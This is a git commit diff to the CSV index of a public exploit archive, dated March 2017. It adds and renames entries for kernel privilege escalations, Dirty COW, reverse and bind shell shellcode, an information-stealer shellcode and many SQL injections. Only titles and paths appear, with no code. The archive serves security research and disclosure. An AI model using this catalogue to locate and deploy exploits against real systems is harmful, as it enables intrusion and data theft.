DB: 2017-03-07

31 new exploits iSQL 1.0 - isql_main.c Buffer Overflow (PoC) iSQL 1.0 - 'isql_main.c' Buffer Overflow (PoC) Memcached 1.4.33 - 'Crash' PoC Memcached 1.4.33 - 'Add' PoC Memcached 1.4.33 - 'sasl' PoC Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Windows 10 (x86/x64) WLAN AutoConfig - Denial of Service (POC) Windows 10 (x86/x64) WLAN AutoConfig - Denial of Service (PoC) Microsoft Windows gdi32.dll - EMR_SETDIBITSTODEVICE Heap-Based Out-of-Bounds Reads / Memory Disclosure Microsoft Windows - 'gdi32.dll' EMR_SETDIBITSTODEVICE Heap-Based Out-of-Bounds Reads / Memory Disclosure Microsoft Office PowerPoint 2010 GDI - 'GDI32!ConvertDxArray' Insufficient Bounds Check Microsoft Office PowerPoint 2010 - GDI 'GDI32!ConvertDxArray' Insufficient Bounds Check Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free PoC Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free (PoC) Conext ComBox 865-1058 - Denial of Service Microsoft Internet Explorer 11 (Windows 10) - VBScript Memory Corruption Proof-of-Concept Exploit (MS16-051) Microsoft Internet Explorer 11 (Windows 10) - VBScript Memory Corruption (PoC) (MS16-051) Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition PoC (Write Access) Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (PoC) (Write Access) Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' PTRACE_POKEDATA Race Condition PoC (Write Access) Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' PTRACE_POKEDATA Race Condition (PoC) (Write Access) CyberGhost 6.0.4.2205 - Privilege Escalation FTPShell Client 6.53 - Buffer Overflow Linux/x86-64 - /bin/sh Shellcode Linux/x86-64 - /bin/sh Shellcode (34 bytes) Linux/x86-64 - Reverse Shell Shellcode Linux/x86-64 - Reverse Shell Shellcode (134 bytes) Linux/x86-64 - XOR Encode execve Shellcode Linux/x86-64 - XOR Encode execve Shellcode (84 bytes) Linux/x86_64 - Bind 5600 TCP Port - Shellcode (87 bytes) Linux/x86_64 - execve /bin/sh Shellcode (22 bytes) Linux/x86-64 - Bind 5600 TCP Port - Shellcode (87 bytes) Linux/x86-64 - execve /bin/sh Shellcode (22 bytes) Linux/x86_64 - Random Listener Shellcode (54 bytes) Linux/x86-64 - Random Listener Shellcode (54 bytes) Wordpress < 4.7.1 - Username Enumeration WordPress < 4.7.1 - Username Enumeration Advanced Bus Booking Script 2.04 - SQL Injection Entrepreneur Bus Booking Script 3.03 - 'hid_Busid' Parameter SQL Injection Single Theater Booking Script - 'newsid' Parameter SQL Injection Responsive Events & Movie Ticket Booking Script - SQL Injection Online Cinema and Event Booking Script 2.01 - 'newsid' Parameter SQL Injection Redbus Clone Script 3.05 - 'hid_Busid' Parameter SQL Injection Groupon Clone Script 3.01 - 'catid' Parameter SQL Injection Naukri Clone Script 3.02 - 'type' Parameter SQL Injection Yellow Pages Clone Script 1.3.4 - SQL Injection Advanced Matrimonial Script 2.0.3 - SQL Injection Advanced Real Estate Script 4.0.6 - SQL Injection PHP Classifieds Rental Script 3.6.0 - 'scatid' Parameter SQL Injection Entrepreneur B2B Script 2.0.4 - 'id' Parameter SQL Injection PHP Matrimonial Script 3.0 - SQL Injection MLM Binary Plan Script 2.0.5 - SQL Injection MLM Forced Matrix 2.0.7 - SQL Injection MLM Forex Market Plan Script 2.0.1 - SQL Injection MLM Membership Plan Script 2.0.5 - SQL Injection Multireligion Responsive Matrimonial Script 4.7.1 - SQL Injection Network Community Script 3.0.2 - SQL Injection PHP B2B Script 3.05 - SQL Injection Responsive Matrimonial Script 4.0.1 - SQL Injection Schools Alert Management Script 2.01 - 'list_id' Parameter SQL Injection Select Your College Script 2.01 - SQL Injection Social Network Script 3.01 - 'id' Parameter SQL Injection Website Broker Script 3.02 - 'view' Parameter SQL Injection WordPress Multiple Plugins - Arbitrary File Upload Deluge Web UI 1.3.13 - Cross-Site Request Forgery
2017-03-07 05:01:20 +00:00 · 2017-03-07 05:01:20 +00:00 · 9aef664a7e
commit 9aef664a7e
parent 4811e36301
33 changed files with 1071 additions and 19 deletions
--- a/files.csv
+++ b/files.csv
@ -5155,7 +5155,7 @@ id,file,description,date,author,platform,type,port
 39928,platforms/osx/dos/39928.c,"Apple Mac OSX Kernel - Use-After-Free Due to Bad Locking in IOAcceleratorFamily2",2016-06-10,"Google Security Research",osx,dos,0
 39929,platforms/multiple/dos/39929.c,"Apple Mac OSX / iOS Kernel - UAF Racing getProperty on IOHDIXController and testNetBootMethod on IOHDIXControllerUserClient",2016-06-10,"Google Security Research",multiple,dos,0
 39930,platforms/osx/dos/39930.c,"Apple Mac OSX Kernel - GeForce GPU Driver Stack Buffer Overflow",2016-06-10,"Google Security Research",osx,dos,0
-39939,platforms/linux/dos/39939.rb,"iSQL 1.0 - isql_main.c Buffer Overflow (PoC)",2016-06-13,HaHwul,linux,dos,0
+39939,platforms/linux/dos/39939.rb,"iSQL 1.0 - 'isql_main.c' Buffer Overflow (PoC)",2016-06-13,HaHwul,linux,dos,0
 39940,platforms/linux/dos/39940.txt,"Foxit PDF Reader 1.0.1.0925 - CPDF_StreamContentParser::~CPDF_StreamContentParser Heap Based Memory Corruption",2016-06-13,"Google Security Research",linux,dos,0
 39941,platforms/linux/dos/39941.txt,"Foxit PDF Reader 1.0.1.0925 - CPDF_DIBSource::TranslateScanline24bpp Out-of-Bounds Read",2016-06-13,"Google Security Research",linux,dos,0
 39942,platforms/linux/dos/39942.txt,"Foxit PDF Reader 1.0.1.0925 - CFX_WideString::operator= Invalid Read",2016-06-13,"Google Security Research",linux,dos,0
@ -5259,9 +5259,9 @@ id,file,description,date,author,platform,type,port
 40685,platforms/windows/dos/40685.html,"Microsoft Internet Explorer 9 - MSHTML CAttrArray Use-After-Free (MS14-056)",2016-11-02,Skylined,windows,dos,0
 40687,platforms/hardware/dos/40687.txt,"SunellSecurity NVR / Camera - Denial of Service",2016-11-02,qwsj,hardware,dos,0
 40691,platforms/windows/dos/40691.html,"Microsoft Internet Explorer 11 - MSHTML CView::CalculateImageImmunity Use-After-Free",2016-11-02,Skylined,windows,dos,0
-40695,platforms/linux/dos/40695.c,"Memcached 1.4.33 - 'Crash' PoC",2016-11-01,"p0wd3r / dawu",linux,dos,0
+40695,platforms/linux/dos/40695.c,"Memcached 1.4.33 - 'Crash' (PoC)",2016-11-01,"p0wd3r / dawu",linux,dos,0
-40696,platforms/linux/dos/40696.c,"Memcached 1.4.33 - 'Add' PoC",2016-11-01,"p0wd3r / dawu",linux,dos,0
+40696,platforms/linux/dos/40696.c,"Memcached 1.4.33 - 'Add' (PoC)",2016-11-01,"p0wd3r / dawu",linux,dos,0
-40697,platforms/linux/dos/40697.c,"Memcached 1.4.33 - 'sasl' PoC",2016-11-01,"p0wd3r / dawu",linux,dos,0
+40697,platforms/linux/dos/40697.c,"Memcached 1.4.33 - 'sasl' (PoC)",2016-11-01,"p0wd3r / dawu",linux,dos,0
 40699,platforms/windows/dos/40699.txt,"Axessh 4.2 - Denial of Service",2016-11-03,hyp3rlinx,windows,dos,0
 40703,platforms/windows/dos/40703.pl,"Microsoft Windows Server 2008/2012 - LDAP RootDSE Netlogon Denial of Service",2016-11-08,"Todor Donev",windows,dos,0
 40722,platforms/windows/dos/40722.html,"Microsoft Internet Explorer 9 - MSHTML CPtsTextParaclient::CountApes Out-of-Bounds Read",2016-11-07,Skylined,windows,dos,0
@ -5300,7 +5300,7 @@ id,file,description,date,author,platform,type,port
 40878,platforms/windows/dos/40878.txt,"Microsoft Edge - CMarkup::EnsureDeleteCFState Use-After-Free (MS15-125)",2016-12-06,Skylined,windows,dos,0
 40879,platforms/windows/dos/40879.html,"Microsoft Internet Explorer 9 - CDoc::ExecuteScriptUri Use-After-Free (MS13-009)",2016-12-06,Skylined,windows,dos,0
 40880,platforms/windows/dos/40880.txt,"Microsoft Edge - CBaseScriptable::PrivateQueryInterface Memory Corruption (MS16-068)",2016-12-06,Skylined,windows,dos,0
-40883,platforms/windows/dos/40883.py,"Windows 10 (x86/x64) WLAN AutoConfig - Denial of Service (POC)",2016-12-06,"Jeremy Brown",windows,dos,0
+40883,platforms/windows/dos/40883.py,"Windows 10 (x86/x64) WLAN AutoConfig - Denial of Service (PoC)",2016-12-06,"Jeremy Brown",windows,dos,0
 40885,platforms/windows/dos/40885.py,"Dual DHCP DNS Server 7.29 - Denial of Service",2016-12-07,R-73eN,windows,dos,0
 40886,platforms/hardware/dos/40886.py,"TP-LINK TD-W8951ND - Denial of Service",2016-12-07,"Persian Hack Team",hardware,dos,0
 40888,platforms/linux/dos/40888.py,"OpenSSH 7.2 - Denial of Service",2016-12-07,"SecPod Research",linux,dos,0
@ -5360,7 +5360,7 @@ id,file,description,date,author,platform,type,port
 41222,platforms/windows/dos/41222.py,"Microsoft Windows 10 - SMBv3 Tree Connect (PoC)",2017-02-01,"laurent gaffie",windows,dos,0
 41232,platforms/android/dos/41232.txt,"Google Android - 'rkp_set_init_page_ro' RKP Memory Corruption",2017-02-02,"Google Security Research",android,dos,0
 41278,platforms/openbsd/dos/41278.txt,"OpenBSD HTTPd < 6.0 - Memory Exhaustion Denial of Service",2017-02-07,PierreKimSec,openbsd,dos,80
-41363,platforms/windows/dos/41363.txt,"Microsoft Windows gdi32.dll - EMR_SETDIBITSTODEVICE Heap-Based Out-of-Bounds Reads / Memory Disclosure",2017-02-15,"Google Security Research",windows,dos,0
+41363,platforms/windows/dos/41363.txt,"Microsoft Windows - 'gdi32.dll' EMR_SETDIBITSTODEVICE Heap-Based Out-of-Bounds Reads / Memory Disclosure",2017-02-15,"Google Security Research",windows,dos,0
 41350,platforms/linux/dos/41350.c,"Linux Kernel 3.10.0 (CentOS7) - Denial of Service",2017-02-12,FarazPajohan,linux,dos,0
 41351,platforms/android/dos/41351.txt,"LG G4 - lgdrmserver Binder Service Multiple Race Conditions",2017-02-14,"Google Security Research",android,dos,0
 41352,platforms/android/dos/41352.txt,"LG G4 - lghashstorageserver Directory Traversal",2017-02-14,"Google Security Research",android,dos,0
@ -5374,7 +5374,7 @@ id,file,description,date,author,platform,type,port
 41369,platforms/hardware/dos/41369.txt,"Cisco ASA - WebVPN CIFS Handling Buffer Overflow",2017-02-15,"Google Security Research",hardware,dos,0
 41417,platforms/windows/dos/41417.txt,"Microsoft Office PowerPoint 2010 - 'MSO!Ordinal5429' Missing Length Check Heap Corruption",2017-02-21,"Google Security Research",windows,dos,0
 41418,platforms/windows/dos/41418.txt,"Microsoft Office PowerPoint 2010 - MSO/OART Heap Out-of-Bounds Access",2017-02-21,"Google Security Research",windows,dos,0
-41419,platforms/windows/dos/41419.txt,"Microsoft Office PowerPoint 2010 GDI - 'GDI32!ConvertDxArray' Insufficient Bounds Check",2017-02-21,"Google Security Research",windows,dos,0
+41419,platforms/windows/dos/41419.txt,"Microsoft Office PowerPoint 2010 - GDI 'GDI32!ConvertDxArray' Insufficient Bounds Check",2017-02-21,"Google Security Research",windows,dos,0
 41420,platforms/multiple/dos/41420.txt,"Adobe Flash - MP4 AMF Parsing Overflow",2017-02-21,"Google Security Research",multiple,dos,0
 41421,platforms/multiple/dos/41421.txt,"Adobe Flash - SWF Stack Corruption",2017-02-21,"Google Security Research",multiple,dos,0
 41422,platforms/multiple/dos/41422.txt,"Adobe Flash - Use-After-Free in Applying Bitmap Filter",2017-02-21,"Google Security Research",multiple,dos,0
@ -5383,9 +5383,10 @@ id,file,description,date,author,platform,type,port
 41426,platforms/windows/dos/41426.txt,"EasyCom For PHP 4.0.0 - Denial of Service",2017-02-22,hyp3rlinx,windows,dos,0
 41434,platforms/multiple/dos/41434.html,"Google Chrome - 'layout' Out-of-Bounds Read",2017-02-22,"Google Security Research",multiple,dos,0
 41454,platforms/windows/dos/41454.html,"Microsoft Edge and Internet Explorer - 'HandleColumnBreakOnColumnSpanningElement' Type Confusion",2017-02-24,"Google Security Research",windows,dos,0
-41457,platforms/linux/dos/41457.c,"Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free PoC",2017-02-26,"Andrey Konovalov",linux,dos,0
+41457,platforms/linux/dos/41457.c,"Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free (PoC)",2017-02-26,"Andrey Konovalov",linux,dos,0
 41474,platforms/windows/dos/41474.py,"BlueIris 4.5.1.4 - Denial of Service",2017-02-28,"Peter Baris",windows,dos,0
 41475,platforms/windows/dos/41475.py,"Synchronet BBS 3.16c - Denial of Service",2017-02-28,"Peter Baris",windows,dos,0
 41537,platforms/hardware/dos/41537.py,"Conext ComBox 865-1058 - Denial of Service",2017-03-02,"Mark Liapustin and Arik Kublanov",hardware,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -8674,7 +8675,7 @@ id,file,description,date,author,platform,type,port
 40072,platforms/windows/local/40072.txt,"InstantHMI 6.1 - Privilege Escalation",2016-07-08,sh4d0wman,windows,local,0
 40107,platforms/windows/local/40107.rb,"Microsoft Windows 7 < 10 / 2008 < 2012 (x86/x64) - Secondary Logon Handle Privilege Escalation (MS16-032) (Metasploit)",2016-07-13,Metasploit,windows,local,0
 40145,platforms/windows/local/40145.txt,"Rapid7 AppSpider 6.12 - Privilege Escalation",2016-07-25,LiquidWorm,windows,local,0
-40118,platforms/windows/local/40118.txt,"Microsoft Internet Explorer 11 (Windows 10) - VBScript Memory Corruption Proof-of-Concept Exploit (MS16-051)",2016-06-22,"Brian Pak",windows,local,0
+40118,platforms/windows/local/40118.txt,"Microsoft Internet Explorer 11 (Windows 10) - VBScript Memory Corruption (PoC) (MS16-051)",2016-06-22,"Brian Pak",windows,local,0
 40132,platforms/windows/local/40132.txt,"Wowza Streaming Engine 4.5.0 - Local Privilege Escalation",2016-07-20,LiquidWorm,windows,local,0
 40141,platforms/bsd/local/40141.c,"NetBSD mail.local(8) - Privilege Escalation (NetBSD-SA2016-006)",2016-07-21,akat1,bsd,local,0
 40148,platforms/windows/local/40148.py,"Mediacoder 0.8.43.5852 - '.m3u' SEH Exploit",2016-07-25,"Karn Ganeshen",windows,local,0
@ -8745,7 +8746,7 @@ id,file,description,date,author,platform,type,port
 40606,platforms/windows/local/40606.cpp,"Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure DACL Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local,0
 40607,platforms/windows/local/40607.cpp,"Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure Boundary Descriptor Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local,0
 40608,platforms/windows/local/40608.cs,"Microsoft Windows - NtLoadKeyEx Read Only Hive Arbitrary File Write Privilege Escalation (MS16-124)",2016-10-20,"Google Security Research",windows,local,0
-40611,platforms/linux/local/40611.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition PoC (Write Access)",2016-10-19,"Phil Oester",linux,local,0
+40611,platforms/linux/local/40611.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (PoC) (Write Access)",2016-10-19,"Phil Oester",linux,local,0
 40616,platforms/linux/local/40616.c,"Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' /proc/self/mem Race Condition Privilege Escalation (SUID)",2016-10-21,"Robin Verton",linux,local,0
 40627,platforms/win_x86/local/40627.c,"Microsoft Windows (x86) - 'NDISTAPI' Privilege Escalation (MS11-062)",2016-10-24,"Tomislav Paskalev",win_x86,local,0
 40630,platforms/windows/local/40630.py,"Network Scanner 4.0.0 - SEH Local Buffer Overflow",2016-10-25,n30m1nd,windows,local,0
@ -8760,7 +8761,7 @@ id,file,description,date,author,platform,type,port
 40688,platforms/linux/local/40688.rb,"Linux Kernel (Ubuntu / Fedora / RedHat) - 'Overlayfs' Privilege Escalation (Metasploit)",2016-11-02,Metasploit,linux,local,0
 40679,platforms/linux/local/40679.sh,"MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - ('root' System User) Privilege Escalation",2016-11-01,"Dawid Golunski",linux,local,0
 40710,platforms/aix/local/40710.sh,"IBM AIX 5.3/6.1/7.1/7.2 - 'lquerylv' Privilege Escalation",2016-11-04,"Hector X. Monsegur",aix,local,0
-40838,platforms/linux/local/40838.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' PTRACE_POKEDATA Race Condition PoC (Write Access)",2016-10-26,"Phil Oester",linux,local,0
+40838,platforms/linux/local/40838.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' PTRACE_POKEDATA Race Condition (PoC) (Write Access)",2016-10-26,"Phil Oester",linux,local,0
 40759,platforms/linux/local/40759.rb,"Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Privilege Escalation (Metasploit)",2016-11-14,Metasploit,linux,local,0
 40741,platforms/windows/local/40741.py,"Avira Antivirus 15.0.21.86 - '.zip' Directory Traversal / Command Execution",2016-11-08,R-73eN,windows,local,0
 40765,platforms/windows/local/40765.cs,"Microsoft Windows - VHDMP Arbitrary Physical Disk Cloning Privilege Escalation (MS16-138)",2016-11-15,"Google Security Research",windows,local,0
@ -8823,6 +8824,7 @@ id,file,description,date,author,platform,type,port
 41435,platforms/linux/local/41435.txt,"Shutter 0.93.1 - Code Execution",2016-12-26,Prajith,linux,local,0
 41458,platforms/linux/local/41458.c,"Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation",2017-02-26,"Andrey Konovalov",linux,local,0
 41476,platforms/windows/local/41476.txt,"Cisco AnyConnect Secure Mobility Client 4.3.04027 - Privilege Escalation",2017-02-28,Pcchillin,windows,local,0
 41538,platforms/windows/local/41538.cs,"CyberGhost 6.0.4.2205 - Privilege Escalation",2017-03-06,"Kacper Szurek",windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -15306,6 +15308,7 @@ id,file,description,date,author,platform,type,port
 41471,platforms/arm/remote/41471.rb,"MVPower DVR TV-7104HE 1.8.4 115215B9 - Shell Unauthenticated Command Execution (Metasploit)",2017-02-27,Metasploit,arm,remote,0
 41479,platforms/windows/remote/41479.py,"SysGauge 1.5.18 - Buffer Overflow",2017-02-28,"Peter Baris",windows,remote,0
 41480,platforms/hardware/remote/41480.txt,"WePresent WiPG-1500 - Backdoor Account",2017-02-27,"Quentin Olagne",hardware,remote,0
 41511,platforms/windows/remote/41511.py,"FTPShell Client 6.53 - Buffer Overflow",2017-03-04,"Peter Baris",windows,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -15833,7 +15836,7 @@ id,file,description,date,author,platform,type,port
 38094,platforms/lin_x86/shellcode/38094.c,"Linux/x86 - Create file with permission 7775 and exit Shellcode (Generator)",2015-09-07,"Ajith Kp",lin_x86,shellcode,0
 38116,platforms/lin_x86/shellcode/38116.c,"Linux/x86 - execve(_/bin/cat__ [_/bin/cat__ _/etc/passwd_]_ NULL) Shellcode (75 bytes)",2015-09-09,"Ajith Kp",lin_x86,shellcode,0
 38126,platforms/osx/shellcode/38126.c,"OSX/x86-64 - 4444/TPC port bind Nullfree Shellcode (144 bytes)",2015-09-10,"Fitzl Csaba",osx,shellcode,0
-38150,platforms/lin_x86-64/shellcode/38150.txt,"Linux/x86-64 - /bin/sh Shellcode",2015-09-11,"Fanda Uchytil",lin_x86-64,shellcode,0
+38150,platforms/lin_x86-64/shellcode/38150.txt,"Linux/x86-64 - /bin/sh Shellcode (34 bytes)",2015-09-11,"Fanda Uchytil",lin_x86-64,shellcode,0
 38194,platforms/android/shellcode/38194.c,"Google Android - Telnetd (Port 1035) with Parameters Shellcode (248 bytes)",2015-09-15,"Steven Padilla",android,shellcode,0
 38239,platforms/lin_x86-64/shellcode/38239.asm,"Linux/x86-64 - execve Shellcode (22 bytes)",2015-09-18,d4sh&r,lin_x86-64,shellcode,0
 38469,platforms/lin_x86-64/shellcode/38469.c,"Linux/x86-64 - Bindshell 31173 port with Password Shellcode (92 bytes)",2015-10-15,d4sh&r,lin_x86-64,shellcode,0
@ -15857,7 +15860,7 @@ id,file,description,date,author,platform,type,port
 39390,platforms/lin_x86-64/shellcode/39390.c,"Linux/x86-64 - Polymorphic Execve-Stack Shellcode (47 bytes)",2016-02-01,"Sathish kumar",lin_x86-64,shellcode,0
 39496,platforms/arm/shellcode/39496.c,"Linux/ARM - Connect back to 10.0.0.10:1337 with /bin/sh Shellcode (95 bytes)",2016-02-26,Xeon,arm,shellcode,0
 39519,platforms/win_x86/shellcode/39519.c,"Windows x86 - Download & Run via WebDAV Null Free Shellcode (96 bytes)",2016-03-02,"Sean Dillon",win_x86,shellcode,0
-39578,platforms/lin_x86-64/shellcode/39578.c,"Linux/x86-64 - Reverse Shell Shellcode",2016-03-21,"Sudhanshu Chauhan",lin_x86-64,shellcode,0
+39578,platforms/lin_x86-64/shellcode/39578.c,"Linux/x86-64 - Reverse Shell Shellcode (134 bytes)",2016-03-21,"Sudhanshu Chauhan",lin_x86-64,shellcode,0
 39617,platforms/lin_x86-64/shellcode/39617.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (26 bytes)",2016-03-24,"Ajith Kp",lin_x86-64,shellcode,0
 39624,platforms/lin_x86-64/shellcode/39624.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (25 bytes)",2016-03-28,"Ajith Kp",lin_x86-64,shellcode,0
 39625,platforms/lin_x86-64/shellcode/39625.c,"Linux/x86-64 - execve(/bin/bash) Shellcode (33 bytes)",2016-03-28,"Ajith Kp",lin_x86-64,shellcode,0
@ -15877,7 +15880,7 @@ id,file,description,date,author,platform,type,port
 39844,platforms/lin_x86-64/shellcode/39844.c,"Linux/x86-64 - Reverse TCP Shell Null Free Shellcode (134 bytes)",2016-05-20,"Sudhanshu Chauhan",lin_x86-64,shellcode,0
 39847,platforms/lin_x86-64/shellcode/39847.c,"Linux/x86-64 - Information Stealer Shellcode (399 bytes)",2016-05-23,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
 39851,platforms/lin_x86/shellcode/39851.c,"Linux/x86 - Bind Shell Port 4444/TCP Shellcode (656 bytes)",2016-05-25,"Brandon Dennis",lin_x86,shellcode,0
-39869,platforms/lin_x86-64/shellcode/39869.c,"Linux/x86-64 - XOR Encode execve Shellcode",2016-05-30,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
+39869,platforms/lin_x86-64/shellcode/39869.c,"Linux/x86-64 - XOR Encode execve Shellcode (84 bytes)",2016-05-30,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
 39885,platforms/multiple/shellcode/39885.c,"Linux/Windows/BSD x86_64 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)",2016-06-06,odzhancode,multiple,shellcode,0
 39900,platforms/win_x86/shellcode/39900.c,"Windows x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes)",2016-06-07,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
 39901,platforms/lin_x86/shellcode/39901.c,"Linux/x86 - /bin/nc -le /bin/sh -vp13337 Shellcode (56 bytes)",2016-06-07,sajith,lin_x86,shellcode,0
@ -15913,8 +15916,8 @@ id,file,description,date,author,platform,type,port
 40981,platforms/win_x86-64/shellcode/40981.c,"Windows x64 - Password Protected Bind Shellcode (825 bytes)",2017-01-01,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
 41072,platforms/win_x86-64/shellcode/41072.c,"Windows x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)",2017-01-15,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
 41089,platforms/lin_x86-64/shellcode/41089.c,"Linux/x86-64 - mkdir Shellcode (25 bytes)",2017-01-18,"Ajith Kp",lin_x86-64,shellcode,0
-41128,platforms/lin_x86-64/shellcode/41128.c,"Linux/x86_64 - Bind 5600 TCP Port - Shellcode (87 bytes)",2017-01-19,"Ajith Kp",lin_x86-64,shellcode,0
+41128,platforms/lin_x86-64/shellcode/41128.c,"Linux/x86-64 - Bind 5600 TCP Port - Shellcode (87 bytes)",2017-01-19,"Ajith Kp",lin_x86-64,shellcode,0
-41174,platforms/lin_x86-64/shellcode/41174.nasm,"Linux/x86_64 - execve /bin/sh Shellcode (22 bytes)",2017-01-26,"Robert L. Taylor",lin_x86-64,shellcode,0
+41174,platforms/lin_x86-64/shellcode/41174.nasm,"Linux/x86-64 - execve /bin/sh Shellcode (22 bytes)",2017-01-26,"Robert L. Taylor",lin_x86-64,shellcode,0
 41183,platforms/linux/shellcode/41183.c,"Linux - Multi/Dual mode execve(_/bin/sh__ NULL_ 0) Shellcode (37 bytes)",2017-01-29,odzhancode,linux,shellcode,0
 41220,platforms/linux/shellcode/41220.c,"Linux - Multi/Dual mode Reverse Shell Shellcode (129 bytes)",2017-02-02,odzhancode,linux,shellcode,0
 41282,platforms/lin_x86/shellcode/41282.nasm,"Linux/x86 - Reverse TCP Alphanumeric Staged Shellcode (103 bytes)",2017-02-08,"Snir Levi",lin_x86,shellcode,0
@ -15924,7 +15927,7 @@ id,file,description,date,author,platform,type,port
 41403,platforms/lin_x86/shellcode/41403.c,"Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)",2017-02-20,"Krzysztof Przybylski",lin_x86,shellcode,0
 41439,platforms/linux/shellcode/41439.c,"Linux/x86-64 - Egghunter Shellcode (38 bytes)",2017-02-23,odzhancode,linux,shellcode,0
 41467,platforms/win_x86/shellcode/41467.c,"Windows x86 - Executable Directory Search Shellcode (130 bytes)",2017-02-26,"Krzysztof Przybylski",win_x86,shellcode,0
-41468,platforms/lin_x86-64/shellcode/41468.nasm,"Linux/x86_64 - Random Listener Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",lin_x86-64,shellcode,0
+41468,platforms/lin_x86-64/shellcode/41468.nasm,"Linux/x86-64 - Random Listener Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",lin_x86-64,shellcode,0
 41477,platforms/linux/shellcode/41477.c,"Linux/x86-64 - Reverse Shell Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",linux,shellcode,0
 41481,platforms/win_x86/shellcode/41481.asm,"Windows x86 - Reverse TCP Staged Alphanumeric Shellcode (332 Bytes)",2017-03-01,"Snir Levi",win_x86,shellcode,0
 41498,platforms/lin_x86-64/shellcode/41498.nasm,"Linux/x86-64 - Polymorphic Setuid(0) & Execve(/bin/sh) Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",lin_x86-64,shellcode,0
@ -37415,7 +37418,7 @@ id,file,description,date,author,platform,type,port
 41494,platforms/php/webapps/41494.txt,"Joomla! Component StreetGuessr Game 1.0 - SQL Injection",2017-03-02,"Ihsan Sencan",php,webapps,0
 41495,platforms/php/webapps/41495.txt,"Joomla! Component Guesser 1.0.4 - 'type' Parameter SQL Injection",2017-03-02,"Ihsan Sencan",php,webapps,0
 41496,platforms/php/webapps/41496.txt,"Joomla! Component Recipe Manager 2.2 - 'id' Parameter SQL Injection",2017-03-02,"Ihsan Sencan",php,webapps,0
-41497,platforms/php/webapps/41497.php,"Wordpress < 4.7.1 - Username Enumeration",2017-03-03,Dctor,php,webapps,0
+41497,platforms/php/webapps/41497.php,"WordPress < 4.7.1 - Username Enumeration",2017-03-03,Dctor,php,webapps,0
 41499,platforms/jsp/webapps/41499.txt,"NetGain Enterprise Manager 7.2.562 - 'Ping' Command Injection",2017-02-23,MrChaZ,jsp,webapps,0
 41500,platforms/php/webapps/41500.txt,"Joomla! Component Coupon 3.5 - SQL Injection",2017-03-03,"Ihsan Sencan",php,webapps,0
 41501,platforms/php/webapps/41501.txt,"pfSense 2.3.2 - Cross-Site Scripting / Cross-Site Request Forgery",2017-03-03,"Yann CAM",php,webapps,0
@ -37425,3 +37428,31 @@ id,file,description,date,author,platform,type,port
 41506,platforms/php/webapps/41506.txt,"Joomla! Component AYS Quiz 1.0 - 'id' Parameter SQL Injection",2017-03-04,"Ihsan Sencan",php,webapps,0
 41507,platforms/php/webapps/41507.txt,"Joomla! Component Content ConstructionKit 1.1 - SQL Injection",2017-03-04,"Ihsan Sencan",php,webapps,0
 41508,platforms/php/webapps/41508.txt,"Joomla! Component AltaUserPoints 1.1 - 'userid' Parameter SQL Injection",2017-03-04,"Ihsan Sencan",php,webapps,0
